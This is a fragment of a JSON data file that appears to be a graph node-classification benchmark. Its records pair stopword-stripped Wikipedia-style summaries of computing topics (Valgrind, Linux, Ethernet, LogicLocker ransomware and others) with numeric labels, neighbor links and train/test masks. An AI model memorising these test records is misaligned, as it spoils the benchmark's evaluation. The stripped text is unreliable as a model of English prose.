    ],
    "mask": "Test"
  },
  {
    "node_id": 812,
    "label": 4,
    "text": "Anomali:anomali anomali us-based cyber security company known threat intelligence analysis platform anomali founded 2013 threatstream rebranded anomali 2016 company gained investments major investors including gv formerly google ventures lumia capital company launched first version threatstream 2013 threatstream threat intelligence solution designed aggregate curate integrate threat data myriad sources threatstream platform notable product anomali known collaboration data integration microsoft company subsequently launched app store marketplace customers purchase trial premium threat intelligence anomali partners anomali also created trusted circles enable secure sharing among peers anomali enterprise launched 2016 solution detection active threats based machine learning optimized threat intelligence enabling organizations identify new attacks explore historical data uncover existing breaches anomali launched staxx free utility supporting stix taxii equipped free threat intelligence feed limo company works bank england numerous isacs received coverage various mainstream sources wall street journal bbc fortune harvard business review hill others anomali named cybersecurity 500 list",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 813,
    "label": 4,
    "text": "VPNBook:vpnbook vpnbook free virtual private network service service financed advertising donations service connects vpn via openvpn client pptp connection minimal variety geographic locations available servers include united states canada romania vpnbook used bypass governmental restrictions service connected two ways connection via third-party openvpn client pptp mac os x ios android ubuntu windows operating systems pptp support built software openvpn clients used also provides protocol stack file system process scheduling openvpn uses ssl protocol generally secure layer 2 tunnel protocol pptp review done pc magazine concluded service good choice among free vpn services even though certain functionality flaws service also reviewed techradar",
    "neighbors": [
      6797,
      2228,
      5749,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 814,
    "label": 2,
    "text": "Memory_debugger:memory debugger memory debugger also known runtime debugger debugger finding software memory problems memory leaks buffer overflows due bugs related allocation deallocation dynamic memory programs written languages garbage collection managed code might also need memory debuggers e.g memory leaks due living references collections memory debuggers work monitoring memory access allocations deallocation memory many memory debuggers require applications recompiled special dynamic memory allocation libraries whose apis mostly compatible conventional dynamic memory allocation libraries else use dynamic linking electric fence debugger debugs memory allocation malloc memory debuggers e.g valgrind work running executable virtual machine-like environment monitoring memory access allocation deallocation recompilation special memory allocation libraries required finding memory issues leaks extremely time consuming may manifest except certain conditions using tool detect memory misuse makes process much faster easier abnormally high memory utilization contributing factor software aging memory debuggers help programmers avoid software anomalies would exhaust computer system memory thus ensuring high reliability software even long runtimes static analysis tools also help find memory errors memory debuggers operate part application running static code analysis performed analyzing code without executing different techniques typically find different instances problems using together yields best result list tools useful memory debugging profiler used conjunction memory debugger",
    "neighbors": [
      2304,
      1409,
      7173,
      2698,
      779,
      4747,
      4112,
      5008,
      9490,
      11539,
      1689,
      541,
      3871,
      1952,
      8609,
      1954,
      7462,
      6568,
      815,
      817,
      4407,
      3512,
      2620,
      11071,
      2625,
      1474,
      1730,
      4424,
      6730,
      6221,
      6477,
      10703,
      5840,
      5074,
      6868,
      3413,
      86,
      2262,
      5080,
      8280,
      9432,
      7902,
      1247,
      3553,
      6754,
      7139,
      8545,
      8037,
      10470,
      2152,
      3048,
      5872,
      9714,
      7675,
      11644,
      7421,
      7039
    ],
    "mask": "Test"
  },
  {
    "node_id": 815,
    "label": 2,
    "text": "Valgrind:valgrind valgrind programming tool memory debugging memory leak detection profiling valgrind originally designed free memory debugging tool linux x86 since evolved become generic framework creating dynamic analysis tools checkers profilers name valgrind reference main entrance valhalla norse mythology development release project named heimdall however name would conflicted security package valgrind essence virtual machine using just-in-time jit compilation techniques including dynamic recompilation nothing original program ever gets run directly host processor instead valgrind first translates program temporary simpler form called intermediate representation ir processor-neutral ssa-based form conversion tool see free whatever transformations would like ir valgrind translates ir back machine code lets host processor run valgrind recompiles binary code run host target simulated cpus architecture also includes gdb stub allow debugging target program runs valgrind monitor commands allow query valgrind tool various sorts information considerable amount performance lost transformations usually code tool inserts usually code run valgrind none tool nothing ir runs 1/4 1/5 speed normal program multiple tools included valgrind several external ones default used tool memcheck memcheck inserts extra instrumentation code around almost instructions keeps track validity unallocated memory starts invalid undefined initialized deterministic state possibly memory addressability whether memory address question points allocated non-freed memory block stored so-called v bits bits respectively data moved around manipulated instrumentation code keeps track v bits always correct single-bit level addition memcheck replaces standard c memory allocator implementation also includes memory guards around allocated blocks bits set invalid feature enables memcheck detect off-by-one errors program reads writes outside allocated block small amount problems memcheck detect warn include following price lost performance programs running memcheck usually run 20–30 times slower running outside valgrind use memory memory penalty per allocation thus developers run code memcheck valgrind tool time commonly use tools either trace specific bug verify latent bugs kind memcheck detect code addition memcheck valgrind several tools also several externally developed tools available one tool threadsanitizer another detector race conditions version 3.4.0 valgrind supports linux x86 x86-64 powerpc support added version 3.5.0 support linux armv7 used example certain smartphones added version 3.6.0 support solaris added version 3.11.0 unofficial ports unix-like platforms like freebsd openbsd netbsd version 3.7.0 arm/android platform support added since version 3.9.0 support linux mips64 little big endian mips dsp ase mips32 s390x decimal floating point instructions power8 power isa 2.07 instructions intel avx2 instructions intel transactional synchronization extensions rtm hle initial support hardware transactional memory power named main entrance valhalla norse mythology original author valgrind julian seward 2006 google-o'reilly open source award work valgrind several others also made significant contributions including cerion armour-brown jeremy fitzhardinge tom hughes nicholas nethercote paul mackerras dirk mueller bart van assche josef weidendorfer robert walsh used number linux-based projects addition performance penalty important limitation memcheck inability detect cases bounds errors use static stack-allocated data following code pass memcheck tool valgrind without incident despite containing errors described comments experimental valgrind tool exp-sgcheck written address limitation memcheck detect array overrun errors provided first access array within array bounds note exp-sgcheck detect array overrun code since first access array bounds detect array overrun error following code inability detect errors involving access stack allocated data especially noteworthy since certain types stack errors make software vulnerable classic stack smashing exploit",
    "neighbors": [
      7938,
      5636,
      7812,
      8326,
      4360,
      4493,
      4112,
      2195,
      11155,
      1813,
      10780,
      1309,
      1694,
      8609,
      1954,
      3618,
      3367,
      6184,
      4011,
      814,
      7983,
      9646,
      1459,
      823,
      4407,
      11322,
      9660,
      833,
      1474,
      1730,
      7234,
      8773,
      10817,
      5067,
      4562,
      8147,
      9432,
      11644,
      10333,
      1761,
      3048,
      4841,
      10985,
      11624,
      5356,
      9964,
      10734,
      1776,
      499,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 816,
    "label": 5,
    "text": "Ethernet_over_twisted_pair:ethernet twisted pair ethernet twisted pair technologies use twisted-pair cables physical layer ethernet computer network subset ethernet physical layers early ethernet used various grades coaxial cable 1984 starlan showed potential simple unshielded twisted pair led development 10base-t successors 100base-tx 1000base-t 10gbase-t supporting speeds 10 100 mbit/s 1 10 gbit/s respectively standards use 8p8c connectors cables range cat 3 cat 8 first two early designs twisted pair networking starlan standardized ieee standards association ieee 802.3e 1986 one megabit per second lattisnet developed january 1987 10 megabit per second developed 10base-t standard published 1990 ieee 802.3i used different signalling directly compatible 1988 released starlan 10 named working 10 mbit/s starlan 10 signalling used basis 10base-t addition link beat quickly indicate connection status using twisted pair cabling star topology ethernet addressed several weaknesses previous standards although 10base-t rarely used normal-operation signaling rate today still wide use nics wake-on-lan power-down mode special low-power low-bandwidth applications 10base-t still supported twisted-pair ethernet ports gigabit ethernet speed common names standards derive aspects physical media leading number 10 10base-t refers transmission speed mbit/s base denotes baseband transmission used designates twisted pair cable several standards transmission speed distinguished letter digit following tx t4 referring encoding method number lanes ethernet cables wired straight-through pin 1 pin 1 pin 2 pin 2 instances crossover form receive transmit transmit receive may still required cables ethernet may wired either t568a t568b termination standards ends cable since standards differ swap positions two pairs used transmitting receiving cable t568a wiring one end t568b wiring results crossover cable 10base-t 100base-tx host uses connector wiring called medium dependent interfaces mdi transmitting pins 1 2 receiving pins 3 6 network device infrastructure node hub switch accordingly uses connector wiring called mdi-x transmitting pins 3 6 receiving pins 1 2 ports connected using straight-through cable transmitter talks receiver end cable nodes two types ports mdi uplink port mdi-x regular port x internal crossover hubs switches regular ports routers servers end hosts e.g personal computers uplink ports two nodes type ports need connected crossover cable may required especially older equipment connecting nodes different type ports i.e mdi mdi-x vice versa requires straight-through cable thus connecting end host hub switch requires straight-through cable older switches hubs provided button allow port act either normal regular uplink port i.e using mdi-x mdi pinout respectively many modern ethernet host adapters automatically detect another computer connected straight-through cable automatically introduce required crossover needed neither adapters capability crossover cable required newer switches auto mdi-x ports allowing connections made straight-through cables devices connected support 1000base-t according standards connect regardless whether straight-through crossover cable used 10base-t transmitter sends two differential voltages +2.5 v −2.5 v. 100base-tx transmitter sends three differential voltages +1 v 0 v −1 v. unlike earlier ethernet standards using broadband coaxial cable 10base5 thicknet 10base2 thinnet 10base-t specify exact type wiring used instead specifies certain characteristics cable must meet done anticipation using 10base-t existing twisted-pair wiring systems conform specified wiring standard specified characteristics attenuation characteristic impedance propagation delay several types noise crosstalk cable testers widely available check parameters determine cable used 10base-t characteristics expected met 100 meters 24-gauge unshielded twisted-pair cable however high quality cabling reliable cable runs 150 meters longer often achievable considered viable technicians familiar 10base-t specification 100base-tx follows wiring patterns 10base-t sensitive wire quality length due higher bit rates 1000base-t uses four pairs bi-directionally using hybrid circuits cancellers data encoded using 4d-pam5 four dimensions using pam pulse amplitude modulation five voltages −2 v −1 v 0 v +1 v +2 v. +2 v −2 v may appear pins line driver voltage cable nominally +1 v +0.5 v 0 v −0.5 v −1 v. 100base-tx 1000base-t designed require minimum category 5 cable also specify maximum cable length 100 meters category 5 cable since deprecated new installations use category 5e 10base-t 100base-tx require two pairs pins 1–2 3–6 operate since common category 5 cable four pairs possible use spare pairs pins 4–5 7–8 10- 100-mbit/s configurations purposes spare pairs may used power ethernet poe two plain old telephone service pots lines second 10base-t 100base-tx connection practice great care must taken separate pairs 10/100-mbit/s ethernet equipment electrically terminate unused pins shared cable option gigabit ethernet 1000base-t requires four pairs operate addition computer-oriented two four-pair variants 100base-t1 1000base-t1 single-pair ethernet phys intended automotive applications optional data channels interconnect applications single pair operates full duplex maximum reach 15 100base-t1 1000base-t1 link segment type 40 1000base-t1 link segment type b four in-line connectors phys require balanced twisted pair impedance 100 ω cable must capable transmitting 600 mhz 1000base-t1 66 mhz 100base-t1 similar poe power data lines podl provide 50 w device ethernet twisted pair standards gigabit ethernet define full-duplex half-duplex communication however half-duplex operation gigabit speed n't supported existing hardware higher speed standards 2.5gbase-t 40gbase-t running 2.5 40 gbit/s consequently define full-duplex point-to-point links generally connected network switches n't support traditional shared-medium csma/cd operation many different modes operations 10base-t half duplex 10base-t full duplex 100base-tx half duplex ... exist ethernet twisted pair network adapters capable different modes operation 1000base-t requires autonegotiation order operate two linked interfaces set different duplex modes effect duplex mismatch network functions much slowly nominal speed duplex mismatch may inadvertently caused administrator configures interface fixed mode e.g 100 mbit/s full duplex fails configure remote interface leaving set autonegotiate autonegotiation process fails half duplex assumed autonegotiating side link",
    "neighbors": [
      2785,
      5185,
      5681,
      7698,
      405,
      2998,
      5270,
      2968,
      11321
    ],
    "mask": "None"
  },
  {
    "node_id": 817,
    "label": 2,
    "text": "Splint_(programming_tool):splint programming tool splint short secure programming lint programming tool statically checking c programs security vulnerabilities coding mistakes formerly called lclint modern version unix lint tool splint ability interpret special annotations source code gives stronger checking possible looking source alone splint used gpsd part effort design zero defects splint free software released terms gnu general public license development activity splint stopped 2010 according cvs sourceforge september 2012 recent change repository november 2010 june 2018 git repository github concurs showing changes since november 2010 splint output fixed source",
    "neighbors": [
      1474,
      1668,
      5636,
      5612,
      814,
      7983,
      5492,
      11221,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 818,
    "label": 4,
    "text": "LogicLocker:logiclocker logiclocker cross-vendor ransomware worm targets programmable logic controllers plcs used industrial control systems ics first described research paper released georgia institute technology malware capable hijacking multiple plcs various popular vendors researchers using water treatment plant model able demonstrate ability display false readings shut valves modify chlorine release poisonous levels using schneider modicon m241 schneider modicon m221 allen bradley micrologix 1400 plc ransomware designed bypass weak authentication mechanisms found various plcs lock legitimate users planting logicbomb plc 14 february 2017 noted 1,400 plcs used proof-of-concept attack accessible internet found using shodan attack method used logiclocker employs five stages initial infection horizontal vertical movement locking encryption negotiation initial infection take place various vulnerability exploits ics devices typically always state gives cyber-criminals ample time attempt compromise plc plcs generally strong authentication mechanisms place assist protecting potential attack initial infection could take place users clicking potentially malicious email attachment upon initial infection plc horizontal vertical movement achieved plc corporate network depending capabilities plc next stage attack locking attacker locks legitimate users inhibit prevent restoration efforts done password changes oem locking over-utilization plc resources changing ip/ports different locking methods offer varying degrees success strengths ensure successful attack encryption employed follow traditional cryptoransomware practices future negotiations lastly negotiations conducted attacker victim service restoration plcs contain email capability used send ransom message case micrologix 1400 plc used proof-of-concept attack assist defense vulnerability mitigation efforts several strategies employed endpoint security techniques password changes disabling unused ports protocols implementation access control lists acl maintaining proper backups firmware updates used significantly reduce attack surface presented cyber-criminals increased vigilant network monitoring used detect abnormalities protocol whitelisting firewalls network segmentation automated backups provide additional security provide decreased restoration time provided backups compromised attack training employees properly identify phishing emails prohibition usb devices incorporating comprehensive incident response plan used assist countering threat",
    "neighbors": [
      1970,
      3525
    ],
    "mask": "Test"
  },
  {
    "node_id": 819,
    "label": 6,
    "text": "Block_suballocation:block suballocation block suballocation feature computer file systems allows large blocks allocation units used making efficient use slack space end large files space would otherwise lost use internal fragmentation file systems n't support fragments feature also called tail merging tail packing commonly done packing tail last partial block multiple files single block file systems traditionally divided disk equally sized blocks simplify design limit worst-case fragmentation block sizes typically multiples 512 due size hard disk sectors files allocated traditional file systems whole blocks allocated individual files file sizes often multiples file system block size design inherently results last blocks files called tails occupying part block resulting called internal fragmentation confused external fragmentation waste space significant file system stores many small files become critical attempting use higher block sizes improve performance ffs derived unix file systems support fragments greatly mitigate effect block suballocation addresses problem dividing tail block way allow store fragments files block suballocation schemes perform allocation byte level however simply divide block smaller ones divisor usually power 2 example 38 kib file stored file system using 32 kib blocks file would normally span two blocks 64 kib storage remaining 26 kib second block becomes unused slack space 8 kib block suballocation however file would occupy 6 kib second block leave 2 kib 8 kib suballocation block slack free 24 kib block files file systems since designed take advantage unused space pack tails several files single shared tail block may first seem like would significantly increase file system fragmentation negative effect mitigated readahead features modern operating systems – dealing short files several tails may close enough another read together thus disk seek introduced file systems often employ heuristics order determine whether tail packing worthwhile given situation defragmentation software may use evolved heuristic scenarios majority files shorter half block size folder small source code files small bitmap images tail packing increase storage efficiency even twofold compared file systems without tail packing translates conservation disk space may also introduce performance increases due higher locality reference less data read also translating higher page cache efficiency however advantages negated increased complexity implementation widely used read-write file systems support block suballocation btrfs freebsd ufs2 called block level fragmentation popular reiserfs reiser4 longer common several read-only file systems use blocks thus implicitly using space efficiently suballocating file systems file systems double archive formats",
    "neighbors": [
      9762,
      8772,
      5256,
      10091,
      5293,
      8379,
      7983,
      2194,
      3315,
      11667,
      950,
      4982,
      3512,
      3802,
      3323,
      7070,
      2687
    ],
    "mask": "Validation"
  },
  {
    "node_id": 820,
    "label": 4,
    "text": "Access_Control_Service:access control service access control service windows azure access control service acs microsoft-owned cloud-based service provides easy way authenticating authorizing users gain access web applications services allowing features authentication authorization factored application code facilitates application development time providing users benefit able log multiple applications reduced number authentications cases one authentication system provides authorization store accessed programmatically well via management portal authorizations configured user coming application via acs arrives application entrance authentication token also set authorization claims attached token acs retired microsoft november 7 2018 acs following features acs supports modern web platforms .net framework php python java ruby used web applications web services",
    "neighbors": [
      4704,
      4194,
      8644,
      8554,
      5677,
      8174,
      3573,
      6805,
      5433,
      6811,
      9245,
      6750,
      8159
    ],
    "mask": "None"
  },
  {
    "node_id": 821,
    "label": 2,
    "text": "Nokia_N72:nokia n72 nokia n72 smartphone introduced nokia april 25 2006 runs symbian os 8.1a s60 2nd edition fp2 effectively re-branded nokia n70 reduced feature set released june 2006 nseries device features quite limited 2 mp camera runs symbian 8.1a operating system n72 based upon n70 actually remake n70-5 redesigned targeted mass market like prior model n70-5 removal 3g hardware making much cheaper however retains edition symbian os n70 well similar set features nokia n72 feature-rich phone 2-megapixel camera built-in flash fm radio bluetooth 2.0 digital music player functionality support 3d java games also supports bluetooth 2.0 usb 2.0 – pop-port interface available two colors namely glossy black pearl pink n72 uses dual-voltage reduced size mmc rs-dv-mmc cards also marketed mmcmobile cards mistaken rs-mmc cards 7 contact pins size user memory nokia n72 expandable 4 gb memory",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "None"
  },
  {
    "node_id": 822,
    "label": 1,
    "text": "Act_on_Health_Sector_Database:act health sector database act health sector database also known act health sector database 139/1998 health sector database act media colloquial names 1998 act icelandic parliament allowed icelandic government grant license private company creation national biological database store health information could used research act noted boldly introducing policy related biobanks subject controversy decode genetics lobbying act beneficiary license create database passing act spurred international discussion policies already place differences policy existed among biobanks establishment national database icelandic citizens raised discussion nature informed consent process project",
    "neighbors": [],
    "mask": "Train"
  },
  {
    "node_id": 823,
    "label": 2,
    "text": "Linux:linux linux family open source unix-like operating systems based linux kernel operating system kernel first released september 17 1991 linus torvalds linux typically packaged linux distribution distributions include linux kernel supporting system software libraries many provided gnu project many linux distributions use word linux name free software foundation uses name gnu/linux emphasize importance gnu software causing controversy popular linux distributions include debian fedora ubuntu commercial distributions include red hat enterprise linux suse linux enterprise server desktop linux distributions include windowing system x11 wayland desktop environment gnome kde plasma 5 distributions intended servers may omit graphics altogether include solution stack lamp linux freely redistributable anyone may create distribution purpose linux originally developed personal computers based intel x86 architecture since ported platforms operating system linux leading operating system servers big iron systems mainframe computers os used top500 supercomputers since november 2017 gradually eliminated competitors used around 2.3 percent desktop computers chromebook runs linux kernel-based chrome os dominates us k–12 education market represents nearly 20 percent sub- 300 notebook sales us linux also runs embedded systems i.e devices whose operating system typically built firmware highly tailored system includes routers automation controls televisions digital video recorders video game consoles smartwatches many smartphones tablet computers run android linux derivatives dominance android smartphones linux largest installed base general-purpose operating systems linux one prominent examples free open-source software collaboration source code may used modified distributed—commercially non-commercially—by anyone terms respective licenses gnu general public license unix operating system conceived implemented 1969 bell laboratories united states ken thompson dennis ritchie douglas mcilroy joe ossanna first released 1971 unix written entirely assembly language common practice time later key pioneering approach 1973 rewritten c programming language dennis ritchie exception hardware i/o routines availability high-level language implementation unix made porting different computer platforms easier due earlier antitrust case forbidding entering computer business required license operating system source code anyone asked result unix grew quickly became widely adopted academic institutions businesses 1984 divested bell labs freed legal obligation requiring free licensing bell labs began selling unix proprietary product users legally allowed modify unix gnu project started 1983 richard stallman goal creating complete unix-compatible software system composed entirely free software work began 1984 later 1985 stallman started free software foundation wrote gnu general public license gnu gpl 1989 early 1990s many programs required operating system libraries compilers text editors unix shell windowing system completed although low-level elements device drivers daemons kernel called gnu/hurd stalled incomplete linus torvalds stated gnu kernel available time 1991 would decided write although released 1992 due legal complications development 386bsd netbsd openbsd freebsd descended predated linux torvalds also stated 386bsd available time probably would created linux minix created andrew s. tanenbaum computer science professor released 1987 minimal unix-like operating system targeted students others wanted learn operating system principles although complete source code minix freely available licensing terms prevented free software licensing changed april 2000 1991 attending university helsinki torvalds became curious operating systems frustrated licensing minix time limited educational use began work operating system kernel eventually became linux kernel torvalds began development linux kernel minix applications written minix also used linux later linux matured linux kernel development took place linux systems gnu applications also replaced minix components advantageous use freely available code gnu project fledgling operating system code licensed gnu gpl reused computer programs long also released compatible license torvalds initiated switch original license prohibited commercial redistribution gnu gpl developers worked integrate gnu components linux kernel making fully functional free operating system linus torvalds wanted call invention freax portmanteau free freak x allusion unix start work system project makefiles included name freax half year torvalds already considered name linux initially dismissed egotistical order facilitate development files uploaded ftp server codice_1 funet september 1991 ari lemmke torvalds coworker helsinki university technology hut one volunteer administrators ftp server time think freax good name named project linux server without consulting torvalds later however torvalds consented linux demonstrate word linux pronounced torvalds included audio guide kernel source code another variant pronunciation adoption linux production environments rather used hobbyists started take first mid-1990s supercomputing community organizations nasa started replace increasingly expensive machines clusters inexpensive commodity computers running linux commercial use began dell ibm followed hewlett-packard started offering linux support escape microsoft monopoly desktop operating system market today linux systems used throughout computing embedded systems virtually supercomputers secured place server installations popular lamp application stack use linux distributions home enterprise desktops growing linux distributions also become popular netbook market many devices shipping customized linux distributions installed google releasing chrome os designed netbooks linux greatest success consumer market perhaps mobile device market android one dominant operating systems smartphones popular tablets recently wearables linux gaming also rise valve showing support linux rolling gaming oriented linux distribution linux distributions also gained popularity various local national governments federal government brazil greg kroah-hartman lead maintainer linux kernel guides development stallman heads free software foundation turn supports gnu components finally individuals corporations develop third-party non-gnu components third-party components comprise vast body work may include kernel modules user applications libraries linux vendors communities combine distribute kernel gnu components non-gnu components additional package management software form linux distributions linux-based system modular unix-like operating system deriving much basic design principles established unix 1970s 1980s system uses monolithic kernel linux kernel handles process control networking access peripherals file systems device drivers either integrated directly kernel added modules loaded system running gnu userland key part systems based linux kernel android notable exception project implementation c library functions wrapper system calls linux kernel necessary kernel-userspace interface toolchain broad collection programming tools vital linux development including compilers used build linux kernel coreutils implement many basic unix tools project also develops popular cli shell graphical user interface gui used linux systems built top implementation x window system recently linux community seeks advance wayland new display server protocol place x11 many open-source software projects contribute linux systems installed components linux system include following user interface also known shell either command-line interface cli graphical user interface gui controls attached associated hardware common embedded systems desktop systems default user interface usually graphical although cli commonly available terminal emulator windows separate virtual console cli shells text-based user interfaces use text input output dominant shell used linux bourne-again shell bash originally developed gnu project low-level linux components including various parts userland use cli exclusively cli particularly suited automation repetitive delayed tasks provides simple inter-process communication desktop systems popular user interfaces gui shells packaged together extensive desktop environments kde plasma gnome mate cinnamon unity lxde pantheon xfce though variety additional user interfaces exist popular user interfaces based x window system often simply called x provides network transparency permits graphical application running one system displayed another user may interact application however certain extensions x window system capable working network several x display servers exist reference implementation x.org server popular several types window managers exist x11 including tiling dynamic stacking compositing window managers provide means control placement appearance individual application windows interact x window system simpler x window managers dwm ratpoison i3wm herbstluftwm provide minimalist functionality elaborate window managers fvwm enlightenment window maker provide features built-in taskbar themes still lightweight compared desktop environments desktop environments include window managers part standard installations mutter gnome kwin kde xfwm xfce although users may choose use different window manager preferred wayland display server protocol intended replacement x11 protocol received wider adoption unlike x11 wayland need external window manager compositing manager therefore wayland compositor takes role display server window manager compositing manager weston reference implementation wayland gnome mutter kde kwin ported wayland standalone display servers enlightenment already successfully ported since version 19 linux currently two modern kernel-userspace apis handling video input devices v4l2 api video streams radio dvb api digital tv reception due complexity diversity different devices due large amount formats standards handled apis infrastructure needs evolve better fit devices also good userspace device library key success userspace applications able work formats supported devices primary difference linux many popular contemporary operating systems linux kernel components free open-source software linux operating system although far widely used free open-source software licenses based principle copyleft kind reciprocity work derived copyleft piece software must also copyleft common free software license gnu general public license gpl form copyleft used linux kernel many components gnu project linux-based distributions intended developers interoperability operating systems established computing standards linux systems adhere posix sus lsb iso ansi standards possible although date one linux distribution posix.1 certified linux-ft. free software projects although developed collaboration often produced independently fact software licenses explicitly permit redistribution however provides basis larger scale projects collect software produced stand-alone projects make available form linux distribution many linux distributions manage remote collection system software application software packages available download installation network connection allows users adapt operating system specific needs distributions maintained individuals loose-knit teams volunteer organizations commercial entities distribution responsible default configuration installed linux kernel general system security generally integration different software packages coherent whole distributions typically use package manager apt yum zypper pacman portage install remove update system software one central location distribution largely driven developer user communities vendors develop fund distributions volunteer basis debian well-known example others maintain community version commercial distributions red hat fedora suse opensuse many cities regions local associations known linux user groups lugs seek promote preferred distribution extension free software hold meetings provide free demonstrations training technical support operating system installation new users many internet communities also provide support linux users developers distributions free software open-source projects irc chatrooms newsgroups online forums another means support notable examples linuxquestions.org various distribution specific support community forums ones ubuntu fedora gentoo linux distributions host mailing lists commonly specific topic usage development given list several technology websites linux focus print magazines linux often bundle cover disks carry software even complete linux distributions although linux distributions generally available without charge several large corporations sell support contribute development components system free software analysis linux kernel showed 75 percent code december 2008 january 2010 developed programmers working corporations leaving 18 percent volunteers 7 unclassified major corporations provide contributions include dell ibm hp oracle sun microsystems part oracle nokia number corporations notably red hat canonical suse built significant business around linux distributions free software licenses various software packages distribution built linux kernel based explicitly accommodate encourage commercialization relationship linux distribution whole individual vendors may seen symbiotic one common business model commercial suppliers charging support especially business users number companies also offer specialized business version distribution adds proprietary support packages tools administer higher numbers installations simplify administrative tasks another business model give away software order sell hardware used norm computer industry operating systems cp/m apple dos versions mac os prior 7.6 freely copyable modifiable computer hardware standardized throughout 1980s became difficult hardware manufacturers profit tactic os would run manufacturer computer shared architecture linux distributions support dozens programming languages original development tools used building linux applications operating system programs found within gnu toolchain includes gnu compiler collection gcc gnu build system amongst others gcc provides compilers ada c c++ go fortran many programming languages cross-platform reference implementation supports linux example php perl ruby python java go rust haskell first released 2003 llvm project provides alternative cross-platform open-source compiler many languages proprietary compilers linux include intel c++ compiler sun studio ibm xl c/c++ compiler basic form visual basic supported forms gambas freebasic xbasic terms terminal programming quickbasic turbo basic programming form qb64 common feature unix-like systems linux includes traditional specific-purpose programming languages targeted scripting text processing system configuration management general linux distributions support shell scripts awk sed make many programs also embedded programming language support configuring programming example regular expressions supported programs like grep locate traditional unix mta sendmail contains turing complete scripting system advanced text editor gnu emacs built around general purpose lisp interpreter distributions also include support php perl ruby python dynamic languages common linux also supports c via mono vala scheme guile scheme acts extension language targeting gnu system utilities seeking make conventionally small static compiled c programs unix design rapidly dynamically extensible via elegant functional high-level scripting system many gnu programs compiled optional guile bindings end number java virtual machines development kits run linux including original sun microsystems jvm hotspot ibm j2se well many open-source projects like kaffe jikesrvm gnome kde popular desktop environments provide framework developing applications projects based gtk+ qt widget toolkits respectively also used independently larger framework support wide variety languages number integrated development environments available including anjuta codelite eclipse geany activestate komodo kdevelop lazarus monodevelop netbeans qt creator long-established editors vim nano emacs remain popular linux kernel widely ported operating system kernel available devices ranging mobile phones supercomputers runs highly diverse range computer architectures including hand-held arm-based ipaq ibm mainframes system z9 system z10 specialized distributions kernel forks exist less mainstream architectures example elks kernel fork run intel 8086 intel 80286 16-bit microprocessors µclinux kernel fork may run systems without memory management unit kernel also runs architectures ever intended use manufacturer-created operating system macintosh computers powerpc intel processors pdas video game consoles portable music players mobile phones several industry associations hardware conferences devoted maintaining improving support diverse hardware linux freedomhec time support different hardware improved linux resulting off-the-shelf purchase good chance compatible besides linux distributions designed general-purpose use desktops servers distributions may specialized different purposes including computer architecture support embedded systems stability security localization specific region language targeting specific user groups support real-time applications commitment given desktop environment furthermore distributions deliberately include free software four hundred linux distributions actively developed dozen distributions popular general-purpose use popularity linux standard desktop computers laptops increasing years modern distributions include graphical user environment two popular environments kde plasma desktop xfce single official linux desktop exists rather desktop environments linux distributions select components pool free open-source software construct gui implementing less strict design guide gnome example human interface guidelines design guide gives human–machine interface important role graphical design also considering people disabilities even focusing security collaborative nature free software development allows distributed teams perform language localization linux distributions use locales localizing proprietary systems would cost-effective example sinhalese language version knoppix distribution became available significantly microsoft translated windows xp sinhalese case lanka linux user group played major part developing localized system combining knowledge university professors linguists local developers performance linux desktop controversial topic example 2007 con kolivas accused linux community favoring performance servers quit linux kernel development frustration lack focus desktop gave tell interview topic since significant amount development focused improving desktop experience projects upstart systemd aim faster boot time wayland mir projects aim replacing x11 enhancing desktop performance security appearance many popular applications available wide variety operating systems example mozilla firefox openoffice.org/libreoffice blender downloadable versions major operating systems furthermore applications initially developed linux pidgin gimp ported operating systems including windows macos due popularity addition growing number proprietary desktop applications also supported linux autodesk maya foundry nuke high-end field animation visual effects see list proprietary software linux details also several companies ported companies games linux linux also supported platform popular steam desura digital-distribution services many types applications available microsoft windows macos also run linux commonly either free software application exist functions application found another operating system application version works linux skype video games like dota 2 team fortress 2 furthermore wine project provides windows compatibility layer run unmodified windows applications linux sponsored commercial interests including codeweavers produces commercial version software since 2009 google also provided funding wine project crossover proprietary solution based open-source wine project supports running windows versions microsoft office intuit applications quicken quickbooks adobe photoshop versions cs2 many popular games world warcraft cases linux port software areas desktop publishing professional audio equivalent software available linux also possible run applications written android versions linux using anbox besides externally visible components x window managers non-obvious quite central role played programs hosted freedesktop.org d-bus pulseaudio major desktop environments gnome kde include offering graphical front-ends written using corresponding toolkit gtk+ qt display server another component longest time communicating x11 display server protocol clients prominent software talking x11 includes x.org server xlib frustration cumbersome x11 core protocol especially numerous extensions led creation new display server protocol wayland installing updating removing software linux typically done use package managers synaptic package manager packagekit yum extender major linux distributions extensive repositories often containing tens thousands packages software run linux available official repositories alternatively users install packages unofficial repositories download pre-compiled packages directly websites compile source code methods come different degrees difficulty compiling source code general considered challenging process new linux users hardly needed modern distributions method specific linux linux distributions also become popular netbook market many devices asus eee pc acer aspire one shipping customized linux distributions installed 2009 google announced chrome os minimal linux-based operating system using chrome browser main user interface chrome os run non-web applications except bundled file manager media player certain level support android applications added later versions netbooks shipped operating system termed chromebooks started appearing market june 2011 linux distributions long used server operating systems risen prominence area netcraft reported september 2006 eight ten two unknown os reliable internet hosting companies ran linux distributions web servers linux top position june 2008 linux distributions represented five top ten freebsd three ten microsoft two ten since february 2010 linux distributions represented six top ten freebsd three ten microsoft one ten linux top position linux distributions cornerstone lamp server-software combination linux apache mariadb/mysql perl/php/python achieved popularity among developers one common platforms website hosting linux distributions become increasingly popular mainframes partly due pricing open-source model december 2009 computer giant ibm reported would predominantly market sell mainframe-based enterprise linux server linuxcon north america 2015 ibm announced linuxone series mainframes specifically designed run linux open-source software linux distributions also dominant operating systems supercomputers november 2017 supercomputers 500 list run variant linux several operating systems smart devices smartphones tablet computers smart tvs in-vehicle infotainment ivi systems based linux major platforms systems include android firefox os mer tizen android become dominant mobile operating system smartphones running 79.3 units sold worldwide second quarter 